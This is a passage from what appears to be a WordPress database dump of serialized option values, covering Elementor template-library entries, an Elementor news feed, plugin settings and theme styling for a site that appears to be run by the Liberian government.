404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/11/404.jpg\";s:12:\"tmpl_created\";i:1606215636;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/travel-blog-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:23:\"[\"404\",\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:672;s:16:\"popularity_index\";i:749;s:11:\"trend_index\";i:759;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:817;a:21:{s:4:\"tmpl\";i:1069;s:2:\"id\";i:15508;s:5:\"title\";s:29:\"Travel Blog &#8211; Archive 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2020/11/Archive-1-350.jpg\";s:12:\"tmpl_created\";i:1606215649;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/blocks/travel-blog-archive-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:673;s:16:\"popularity_index\";i:659;s:11:\"trend_index\";i:468;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:818;a:21:{s:4:\"tmpl\";i:1070;s:2:\"id\";i:15518;s:5:\"title\";s:29:\"Travel Blog &#8211; Archive 2\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2020/11/Archive-2-350-Copy.jpg\";s:12:\"tmpl_created\";i:1606215663;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/blocks/travel-blog-archive-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:674;s:16:\"popularity_index\";i:688;s:11:\"trend_index\";i:431;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:819;a:21:{s:4:\"tmpl\";i:1071;s:2:\"id\";i:15528;s:5:\"title\";s:26:\"Travel Blog &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/11/Footer.jpg\";s:12:\"tmpl_created\";i:1606215673;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/travel-blog-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:26:\"[\"Blog\",\"Footer\",\"Travel\"]\";s:10:\"menu_order\";i:675;s:16:\"popularity_index\";i:656;s:11:\"trend_index\";i:377;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:820;a:21:{s:4:\"tmpl\";i:1067;s:2:\"id\";i:15536;s:5:\"title\";s:26:\"Travel Blog &#8211; Header\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/11/Header.jpg\";s:12:\"tmpl_created\";i:1606215625;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/travel-blog-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:26:\"[\"Blog\",\"Header\",\"Travel\"]\";s:10:\"menu_order\";i:676;s:16:\"popularity_index\";i:584;s:11:\"trend_index\";i:228;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:821;a:21:{s:4:\"tmpl\";i:1072;s:2:\"id\";i:15545;s:5:\"title\";s:33:\"Travel Blog &#8211; Single Post 1\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/11/Single-1-350.jpg\";s:12:\"tmpl_created\";i:1606215684;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/blocks/travel-blog-single-post-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:677;s:16:\"popularity_index\";i:669;s:11:\"trend_index\";i:482;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:822;a:21:{s:4:\"tmpl\";i:1066;s:2:\"id\";i:15556;s:5:\"title\";s:33:\"Travel Blog &#8211; Single Post 2\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/11/Single-2-350.jpg\";s:12:\"tmpl_created\";i:1606215613;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/blocks/travel-blog-single-post-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:678;s:16:\"popularity_index\";i:652;s:11:\"trend_index\";i:454;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}}}','off'),(157,'elementor_remote_info_feed_data','a:3:{i:0;a:5:{s:5:\"title\";s:43:\"Introducing Angie: Agentic AI for WordPress\";s:7:\"excerpt\";s:365:\"Meet Angie, agentic AI purpose-built for WordPress. Angie understands your site, connects to your tools, and takes real actions on your behalf. Its first capability, Angie Code, lets you describe any WordPress feature you can imagine and have it built for you in minutes. Production-ready, fully integrated with your site, and safe to test before it ever goes live.\";s:7:\"created\";i:1774270910;s:5:\"badge\";s:3:\"NEW\";s:3:\"url\";s:142:\"https://elementor.com/blog/introducing-angie-agentic-ai-for-wordpress/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:1;a:5:{s:5:\"title\";s:59:\"The atomic foundation of version 4 is ready for real sites!\";s:7:\"excerpt\";s:296:\"The alpha phase is complete. Version 4 is now in beta, and the atomic foundation is ready to be used on real sites! This is the final step before the official release of version 4.0, activating the new features automatically on new sites, and becoming the default editing experience in Elementor.\";s:7:\"created\";i:1770651621;s:5:\"badge\";s:3:\"NEW\";s:3:\"url\";s:113:\"https://elementor.com/blog/editor-4-beta/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:2;a:5:{s:5:\"title\";s:79:\"Introducing Elementor 3.33: Variables Manager, Custom CSS, Blend Modes, & more!\";s:7:\"excerpt\";s:340:\"Elementor 3.33 builds on the foundation of Editor V4, continuing our mission to create a faster, more scalable, and more intuitive design experience for Web Creators. With the addition of the Variables Manager, element-level Custom CSS, Background Clipping, and Blend Modes, designers have more creative precision and consistency than ever.\";s:7:\"created\";i:1762944115;s:5:\"badge\";s:3:\"NEW\";s:3:\"url\";s:145:\"https://elementor.com/blog/elementor-333-v4-variables-manager-custom-css/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}}','off'),(163,'current_theme','Kava Child','yes'),(164,'theme_mods_kava','a:155:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:16:\"blog_layout_type\";s:7:\"default\";s:10:\"blog_style\";s:7:\"default\";s:12:\"show_tagline\";b:1;s:14:\"page_preloader\";b:1;s:23:\"breadcrumbs_visibillity\";b:1;s:29:\"breadcrumbs_front_visibillity\";b:0;s:22:\"breadcrumbs_page_title\";b:0;s:21:\"breadcrumbs_path_type\";s:8:\"minified\";s:19:\"header_social_links\";b:1;s:19:\"footer_social_links\";b:1;s:14:\"container_type\";s:9:\"fullwidth\";s:13:\"sidebar_width\";s:3:\"1/3\";s:15:\"show_page_title\";b:1;s:16:\"totop_visibility\";b:1;s:22:\"totop_vertical_padding\";s:1:\"0\";s:24:\"totop_horizontal_padding\";s:1:\"0\";s:19:\"totop_border_radius\";s:1:\"0\";s:14:\"totop_bg_color\";b:0;s:16:\"totop_icon_color\";b:0;s:20:\"totop_bg_color_hover\";b:0;s:22:\"totop_icon_color_hover\";b:0;s:12:\"accent_color\";s:7:\"#398ffc\";s:18:\"primary_text_color\";s:7:\"#3b3d42\";s:20:\"secondary_text_color\";s:7:\"#a1a2a4\";s:17:\"invert_text_color\";s:7:\"#ffffff\";s:10:\"link_color\";s:7:\"#398ffc\";s:16:\"link_hover_color\";s:7:\"#3b3d42\";s:8:\"h1_color\";s:7:\"#3b3d42\";s:8:\"h2_color\";s:7:\"#3b3d42\";s:8:\"h3_color\";s:7:\"#3b3d42\";s:8:\"h4_color\";s:7:\"#3b3d42\";s:8:\"h5_color\";s:7:\"#3b3d42\";s:8:\"h6_color\";s:7:\"#3b3d42\";s:16:\"body_font_family\";s:18:\"Roboto, sans-serif\";s:15:\"body_font_style\";s:6:\"normal\";s:16:\"body_font_weight\";s:3:\"300\";s:14:\"body_font_size\";s:2:\"14\";s:16:\"body_line_height\";s:3:\"1.6\";s:19:\"body_letter_spacing\";s:1:\"0\";s:18:\"body_character_set\";s:5:\"latin\";s:15:\"body_text_align\";s:4:\"left\";s:14:\"h1_font_family\";s:18:\"Roboto, sans-serif\";s:13:\"h1_font_style\";s:6:\"normal\";s:14:\"h1_font_weight\";s:3:\"400\";s:12:\"h1_font_size\";s:2:\"56\";s:14:\"h1_line_height\";s:3:\"1.4\";s:17:\"h1_letter_spacing\";s:1:\"0\";s:16:\"h1_character_set\";s:5:\"latin\";s:13:\"h1_text_align\";s:7:\"inherit\";s:14:\"h2_font_family\";s:18:\"Roboto, sans-serif\";s:13:\"h2_font_style\";s:6:\"normal\";s:14:\"h2_font_weight\";s:3:\"400\";s:12:\"h2_font_size\";s:2:\"40\";s:14:\"h2_line_height\";s:3:\"1.4\";s:17:\"h2_letter_spacing\";s:1:\"0\";s:16:\"h2_character_set\";s:5:\"latin\";s:13:\"h2_text_align\";s:7:\"inherit\";s:14:\"h3_font_family\";s:18:\"Roboto, sans-serif\";s:13:\"h3_font_style\";s:6:\"normal\";s:14:\"h3_font_weight\";s:3:\"400\";s:12:\"h3_font_size\";s:2:\"28\";s:14:\"h3_line_height\";s:3:\"1.4\";s:17:\"h3_letter_spacing\";s:1:\"0\";s:16:\"h3_character_set\";s:5:\"latin\";s:13:\"h3_text_align\";s:7:\"inherit\";s:14:\"h4_font_family\";s:18:\"Roboto, sans-serif\";s:13:\"h4_font_style\";s:6:\"normal\";s:14:\"h4_font_weight\";s:3:\"400\";s:12:\"h4_font_size\";s:2:\"20\";s:14:\"h4_line_height\";s:3:\"1.5\";s:17:\"h4_letter_spacing\";s:1:\"0\";s:16:\"h4_character_set\";s:5:\"latin\";s:13:\"h4_text_align\";s:7:\"inherit\";s:14:\"h5_font_family\";s:18:\"Roboto, sans-serif\";s:13:\"h5_font_style\";s:6:\"normal\";s:14:\"h5_font_weight\";s:3:\"300\";s:12:\"h5_font_size\";s:2:\"18\";s:14:\"h5_line_height\";s:3:\"1.5\";s:17:\"h5_letter_spacing\";s:1:\"0\";s:16:\"h5_character_set\";s:5:\"latin\";s:13:\"h5_text_align\";s:7:\"inherit\";s:14:\"h6_font_family\";s:18:\"Roboto, sans-serif\";s:13:\"h6_font_style\";s:6:\"normal\";s:14:\"h6_font_weight\";s:3:\"500\";s:12:\"h6_font_size\";s:2:\"14\";s:14:\"h6_line_height\";s:3:\"1.5\";s:17:\"h6_letter_spacing\";s:1:\"0\";s:16:\"h6_character_set\";s:5:\"latin\";s:13:\"h6_text_align\";s:7:\"inherit\";s:23:\"header_logo_font_family\";s:22:\"Montserrat, sans-serif\";s:22:\"header_logo_font_style\";s:6:\"normal\";s:23:\"header_logo_font_weight\";s:3:\"700\";s:21:\"header_logo_font_size\";s:2:\"26\";s:25:\"header_logo_character_set\";s:5:\"latin\";s:16:\"menu_font_family\";s:18:\"Roboto, sans-serif\";s:15:\"menu_font_style\";s:6:\"normal\";s:16:\"menu_font_weight\";s:3:\"400\";s:14:\"menu_font_size\";s:2:\"14\";s:16:\"menu_line_height\";s:3:\"1.4\";s:19:\"menu_letter_spacing\";s:1:\"0\";s:18:\"menu_character_set\";s:5:\"latin\";s:23:\"breadcrumbs_font_family\";s:18:\"Roboto, sans-serif\";s:22:\"breadcrumbs_font_style\";s:6:\"normal\";s:23:\"breadcrumbs_font_weight\";s:3:\"400\";s:21:\"breadcrumbs_font_size\";s:2:\"11\";s:23:\"breadcrumbs_line_height\";s:3:\"1.5\";s:26:\"breadcrumbs_letter_spacing\";s:1:\"0\";s:25:\"breadcrumbs_character_set\";s:5:\"latin\";s:18:\"button_font_family\";s:18:\"Roboto, sans-serif\";s:17:\"button_font_style\";s:6:\"normal\";s:18:\"button_font_weight\";s:3:\"900\";s:16:\"button_font_size\";s:2:\"11\";s:18:\"button_line_height\";s:1:\"1\";s:21:\"button_letter_spacing\";s:1:\"1\";s:20:\"button_character_set\";s:5:\"latin\";s:15:\"header_bg_color\";s:7:\"#ffffff\";s:15:\"header_bg_image\";N;s:16:\"header_bg_repeat\";s:6:\"repeat\";s:20:\"header_bg_position_x\";s:6:\"center\";s:20:\"header_bg_attachment\";s:6:\"scroll\";s:16:\"top_panel_enable\";b:1;s:12:\"top_panel_bg\";s:7:\"#ffffff\";s:16:\"footer_copyright\";s:72:\"&copy; %%year%% Kava | Multipurpose WP Theme with Elementor Page Builder\";s:21:\"blog_sidebar_position\";s:17:\"one-right-sidebar\";s:20:\"blog_navigation_type\";s:10:\"navigation\";s:16:\"blog_sticky_type\";s:4:\"icon\";s:17:\"blog_sticky_label\";s:8:\"Featured\";s:16:\"blog_post_author\";b:1;s:22:\"blog_post_publish_date\";b:1;s:20:\"blog_post_categories\";b:1;s:14:\"blog_post_tags\";b:1;s:18:\"blog_post_comments\";b:1;s:17:\"blog_post_excerpt\";b:1;s:29:\"blog_post_excerpt_words_count\";s:2:\"50\";s:19:\"blog_read_more_type\";s:4:\"text\";s:19:\"blog_read_more_text\";s:4:\"More\";s:23:\"single_sidebar_position\";s:17:\"one-right-sidebar\";s:18:\"single_post_author\";b:1;s:24:\"single_post_publish_date\";b:1;s:22:\"single_post_categories\";b:1;s:16:\"single_post_tags\";b:1;s:20:\"single_post_comments\";b:1;s:19:\"single_author_block\";b:1;s:21:\"related_posts_visible\";b:1;s:25:\"related_posts_block_title\";s:13:\"Related Posts\";s:19:\"related_posts_count\";s:1:\"4\";s:18:\"related_posts_grid\";s:1:\"2\";s:19:\"related_posts_image\";b:1;s:26:\"related_posts_publish_date\";b:1;s:20:\"related_posts_author\";b:0;s:19:\"related_posts_title\";b:1;s:21:\"related_posts_excerpt\";b:0;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1573188757;s:4:\"data\";a:3:{s:19:\"wp_inactive_widgets\";a:0:{}s:7:\"sidebar\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:12:\"sidebar-shop\";a:0:{}}}}','off'),(165,'theme_switched','','yes'),(169,'theme_mods_kava-child','a:162:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:4:\"main\";i:2;}s:16:\"blog_layout_type\";s:8:\"creative\";s:10:\"blog_style\";s:2:\"v6\";s:12:\"show_tagline\";b:1;s:14:\"page_preloader\";b:1;s:23:\"breadcrumbs_visibillity\";b:1;s:29:\"breadcrumbs_front_visibillity\";b:0;s:22:\"breadcrumbs_page_title\";b:1;s:21:\"breadcrumbs_path_type\";s:8:\"minified\";s:19:\"header_social_links\";b:0;s:19:\"footer_social_links\";b:0;s:14:\"container_type\";s:9:\"fullwidth\";s:13:\"sidebar_width\";s:3:\"1/3\";s:15:\"show_page_title\";b:0;s:16:\"totop_visibility\";b:0;s:22:\"totop_vertical_padding\";s:1:\"0\";s:24:\"totop_horizontal_padding\";s:1:\"0\";s:19:\"totop_border_radius\";s:1:\"0\";s:14:\"totop_bg_color\";b:0;s:16:\"totop_icon_color\";b:0;s:20:\"totop_bg_color_hover\";b:0;s:22:\"totop_icon_color_hover\";b:0;s:12:\"accent_color\";s:7:\"#0a3c11\";s:18:\"primary_text_color\";s:7:\"#0a3c11\";s:20:\"secondary_text_color\";s:7:\"#a1a2a4\";s:17:\"invert_text_color\";s:7:\"#ffffff\";s:10:\"link_color\";s:7:\"#0a3c11\";s:16:\"link_hover_color\";s:7:\"#3b3d42\";s:8:\"h1_color\";s:7:\"#3b3d42\";s:8:\"h2_color\";s:7:\"#3b3d42\";s:8:\"h3_color\";s:7:\"#3b3d42\";s:8:\"h4_color\";s:7:\"#3b3d42\";s:8:\"h5_color\";s:7:\"#3b3d42\";s:8:\"h6_color\";s:7:\"#3b3d42\";s:16:\"body_font_family\";s:18:\"Roboto, sans-serif\";s:15:\"body_font_style\";s:6:\"normal\";s:16:\"body_font_weight\";s:3:\"400\";s:14:\"body_font_size\";s:2:\"14\";s:16:\"body_line_height\";s:3:\"1.6\";s:19:\"body_letter_spacing\";s:1:\"0\";s:18:\"body_character_set\";s:5:\"latin\";s:15:\"body_text_align\";s:4:\"left\";s:14:\"h1_font_family\";s:18:\"Roboto, sans-serif\";s:13:\"h1_font_style\";s:6:\"normal\";s:14:\"h1_font_weight\";s:3:\"400\";s:12:\"h1_font_size\";s:2:\"56\";s:14:\"h1_line_height\";s:3:\"1.4\";s:17:\"h1_letter_spacing\";s:1:\"0\";s:16:\"h1_character_set\";s:5:\"latin\";s:13:\"h1_text_align\";s:7:\"inherit\";s:14:\"h2_font_family\";s:18:\"Roboto, sans-serif\";s:13:\"h2_font_style\";s:6:\"normal\";s:14:\"h2_font_weight\";s:3:\"400\";s:12:\"h2_font_size\";s:2:\"40\";s:14:\"h2_line_height\";s:3:\"1.4\";s:17:\"h2_letter_spacing\";s:1:\"0\";s:16:\"h2_character_set\";s:5:\"latin\";s:13:\"h2_text_align\";s:7:\"inherit\";s:14:\"h3_font_family\";s:18:\"Roboto, sans-serif\";s:13:\"h3_font_style\";s:6:\"normal\";s:14:\"h3_font_weight\";s:3:\"400\";s:12:\"h3_font_size\";s:2:\"28\";s:14:\"h3_line_height\";s:3:\"1.4\";s:17:\"h3_letter_spacing\";s:1:\"0\";s:16:\"h3_character_set\";s:5:\"latin\";s:13:\"h3_text_align\";s:7:\"inherit\";s:14:\"h4_font_family\";s:18:\"Roboto, sans-serif\";s:13:\"h4_font_style\";s:6:\"normal\";s:14:\"h4_font_weight\";s:3:\"400\";s:12:\"h4_font_size\";s:2:\"20\";s:14:\"h4_line_height\";s:3:\"1.5\";s:17:\"h4_letter_spacing\";s:1:\"0\";s:16:\"h4_character_set\";s:5:\"latin\";s:13:\"h4_text_align\";s:7:\"inherit\";s:14:\"h5_font_family\";s:18:\"Roboto, sans-serif\";s:13:\"h5_font_style\";s:6:\"normal\";s:14:\"h5_font_weight\";s:3:\"300\";s:12:\"h5_font_size\";s:2:\"18\";s:14:\"h5_line_height\";s:3:\"1.5\";s:17:\"h5_letter_spacing\";s:1:\"0\";s:16:\"h5_character_set\";s:5:\"latin\";s:13:\"h5_text_align\";s:7:\"inherit\";s:14:\"h6_font_family\";s:18:\"Roboto, sans-serif\";s:13:\"h6_font_style\";s:6:\"normal\";s:14:\"h6_font_weight\";s:3:\"500\";s:12:\"h6_font_size\";s:2:\"14\";s:14:\"h6_line_height\";s:3:\"1.5\";s:17:\"h6_letter_spacing\";s:1:\"0\";s:16:\"h6_character_set\";s:5:\"latin\";s:13:\"h6_text_align\";s:7:\"inherit\";s:23:\"header_logo_font_family\";s:22:\"Montserrat, sans-serif\";s:22:\"header_logo_font_style\";s:6:\"normal\";s:23:\"header_logo_font_weight\";s:3:\"700\";s:21:\"header_logo_font_size\";s:2:\"26\";s:25:\"header_logo_character_set\";s:5:\"latin\";s:16:\"menu_font_family\";s:18:\"Roboto, sans-serif\";s:15:\"menu_font_style\";s:6:\"normal\";s:16:\"menu_font_weight\";s:3:\"400\";s:14:\"menu_font_size\";s:2:\"14\";s:16:\"menu_line_height\";s:3:\"1.4\";s:19:\"menu_letter_spacing\";s:1:\"0\";s:18:\"menu_character_set\";s:5:\"latin\";s:23:\"breadcrumbs_font_family\";s:18:\"Roboto, sans-serif\";s:22:\"breadcrumbs_font_style\";s:6:\"normal\";s:23:\"breadcrumbs_font_weight\";s:3:\"400\";s:21:\"breadcrumbs_font_size\";s:2:\"11\";s:23:\"breadcrumbs_line_height\";s:3:\"1.5\";s:26:\"breadcrumbs_letter_spacing\";s:1:\"0\";s:25:\"breadcrumbs_character_set\";s:5:\"latin\";s:18:\"button_font_family\";s:18:\"Roboto, sans-serif\";s:17:\"button_font_style\";s:6:\"normal\";s:18:\"button_font_weight\";s:3:\"900\";s:16:\"button_font_size\";s:2:\"11\";s:18:\"button_line_height\";s:1:\"1\";s:21:\"button_letter_spacing\";s:1:\"1\";s:20:\"button_character_set\";s:5:\"latin\";s:15:\"header_bg_color\";s:7:\"#ffffff\";s:15:\"header_bg_image\";s:0:\"\";s:16:\"header_bg_repeat\";s:6:\"repeat\";s:20:\"header_bg_position_x\";s:6:\"center\";s:20:\"header_bg_attachment\";s:6:\"scroll\";s:16:\"top_panel_enable\";b:1;s:12:\"top_panel_bg\";s:7:\"#ffffff\";s:16:\"footer_copyright\";s:33:\"© %%year%%. All Rights Reserved.\";s:21:\"blog_sidebar_position\";s:17:\"one-right-sidebar\";s:20:\"blog_navigation_type\";s:10:\"navigation\";s:16:\"blog_sticky_type\";s:4:\"icon\";s:17:\"blog_sticky_label\";s:8:\"Featured\";s:16:\"blog_post_author\";b:1;s:22:\"blog_post_publish_date\";b:1;s:20:\"blog_post_categories\";b:1;s:14:\"blog_post_tags\";b:1;s:18:\"blog_post_comments\";b:0;s:17:\"blog_post_excerpt\";b:1;s:29:\"blog_post_excerpt_words_count\";i:25;s:19:\"blog_read_more_type\";s:4:\"text\";s:19:\"blog_read_more_text\";s:9:\"Read More\";s:23:\"single_sidebar_position\";s:17:\"one-right-sidebar\";s:18:\"single_post_author\";b:1;s:24:\"single_post_publish_date\";b:1;s:22:\"single_post_categories\";b:1;s:16:\"single_post_tags\";b:1;s:20:\"single_post_comments\";b:1;s:19:\"single_author_block\";b:1;s:21:\"related_posts_visible\";b:1;s:25:\"related_posts_block_title\";s:13:\"Related Posts\";s:19:\"related_posts_count\";s:1:\"4\";s:18:\"related_posts_grid\";s:1:\"2\";s:19:\"related_posts_image\";b:1;s:26:\"related_posts_publish_date\";b:1;s:20:\"related_posts_author\";b:0;s:19:\"related_posts_title\";b:1;s:21:\"related_posts_excerpt\";b:0;s:18:\"custom_css_post_id\";i:-1;s:11:\"custom_logo\";i:20;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1573192203;s:4:\"data\";a:3:{s:19:\"wp_inactive_widgets\";a:0:{}s:7:\"sidebar\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:12:\"sidebar-shop\";a:0:{}}}s:18:\"show_archive_title\";b:0;s:17:\"show_archive_desc\";b:0;s:16:\"background_color\";s:6:\"d1e4dd\";s:24:\"enable_under_maintenance\";s:1:\"0\";s:30:\"enable_under_maintenance_pages\";s:1:\"9\";}','yes'),(181,'jet-elements-db-version','2.2.8','yes'),(185,'jet-blog-db-version','2.1.22','yes'),(204,'jet-blog-settings','a:6:{s:4:\"page\";s:17:\"jet-blog-settings\";s:15:\"youtube_api_key\";s:0:\"\";s:16:\"allow_filter_for\";a:5:{i:0;s:8:\"document\";i:1;s:13:\"news_resource\";i:2;s:16:\"project_resource\";i:3;s:13:\"related_theme\";i:4;s:13:\"related_topic\";}s:17:\"available_widgets\";a:6:{s:25:\"jet-blog-posts-navigation\";s:4:\"true\";s:25:\"jet-blog-posts-pagination\";s:4:\"true\";s:22:\"jet-blog-smart-listing\";s:4:\"true\";s:20:\"jet-blog-smart-tiles\";s:4:\"true\";s:20:\"jet-blog-text-ticker\";s:4:\"true\";s:23:\"jet-blog-video-playlist\";s:4:\"true\";}s:18:\"widgets_load_level\";s:3:\"100\";s:17:\"avaliable_widgets\";a:6:{s:25:\"jet-blog-posts-navigation\";s:4:\"true\";s:25:\"jet-blog-posts-pagination\";s:4:\"true\";s:22:\"jet-blog-smart-listing\";s:4:\"true\";s:20:\"jet-blog-smart-tiles\";s:4:\"true\";s:20:\"jet-blog-text-ticker\";s:4:\"true\";s:23:\"jet-blog-video-playlist\";s:4:\"true\";}}','yes'),(220,'_elementor_general_settings','a:3:{s:21:\"default_generic_fonts\";s:10:\"Sans-serif\";s:21:\"global_image_lightbox\";s:3:\"yes\";s:15:\"container_width\";s:4:\"1220\";}','yes'),(221,'_elementor_settings_update_time','1666084188','yes'),(222,'elementor_cpt_support','a:10:{i:0;s:4:\"post\";i:1;s:4:\"page\";i:2;s:8:\"document\";i:3;s:13:\"ekms_bulletin\";i:4;s:11:\"institution\";i:5;s:16:\"knowledge_broker\";i:6;s:12:\"mea_resource\";i:7;s:16:\"project_resource\";i:8;s:13:\"related_topic\";i:9;s:10:\"university\";}','yes'),(223,'elementor_disable_color_schemes','yes','yes'),(224,'elementor_disable_typography_schemes','yes','yes'),(225,'elementor_allow_tracking','yes','yes'),(226,'elementor_default_generic_fonts','Sans-serif','yes'),(227,'elementor_container_width','1220','yes'),(228,'elementor_space_between_widgets','','yes'),(229,'elementor_stretched_section_container','','yes'),(230,'elementor_page_title_selector','','yes'),(231,'elementor_viewport_lg','','yes'),(233,'elementor_viewport_md','','yes'),(234,'elementor_global_image_lightbox','yes','yes'),(235,'elementor_css_print_method','external','yes'),(236,'elementor_editor_break_lines','','yes'),(237,'elementor_edit_buttons','on','yes'),(238,'elementor_allow_svg','','yes'),(239,'elementor_load_fa4_shim','','yes'),(246,'_hfe_db_version','1.1.4','yes'),(251,'theme_mods_oceanwp','a:222:{i:0;b:0;s:18:\"nav_menu_locations\";a:2:{s:9:\"main_menu\";i:2;s:11:\"footer_menu\";i:6;}s:11:\"custom_logo\";i:440;s:17:\"ocean_retina_logo\";s:0:\"\";s:19:\"ocean_primary_color\";s:7:\"#00f445\";s:25:\"ocean_hover_primary_color\";s:7:\"#008c1e\";s:23:\"ocean_main_border_color\";s:7:\"#e9e9e9\";s:17:\"ocean_links_color\";s:0:\"\";s:23:\"ocean_links_color_hover\";s:0:\"\";s:18:\"custom_css_post_id\";i:34;s:29:\"ocean_top_bar_social_profiles\";a:5:{s:7:\"twitter\";s:31:\"https://twitter.com/EkmsLiberia\";s:8:\"facebook\";s:35:\"https://www.facebook.com/ekms.lib.7\";s:5:\"email\";s:23:\"contact@ekmsliberia.org\";s:8:\"dribbble\";s:0:\"\";s:9:\"instagram\";s:38:\"https://www.instagram.com/ekmsliberia/\";}s:30:\"ocean_top_bar_social_font_size\";s:2:\"20\";s:32:\"ocean_top_bar_social_links_color\";s:7:\"#006400\";s:38:\"ocean_top_bar_social_hover_links_color\";s:7:\"#014421\";s:21:\"ocean_top_bar_content\";s:245:\"<img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/liberia_flag.png\" width=\"25px\" height=\"20px\" /> This is an Official website of the Liberian Government | Site Language: [GTranslate] | [oceanwp_popup_login] (Authorized Users 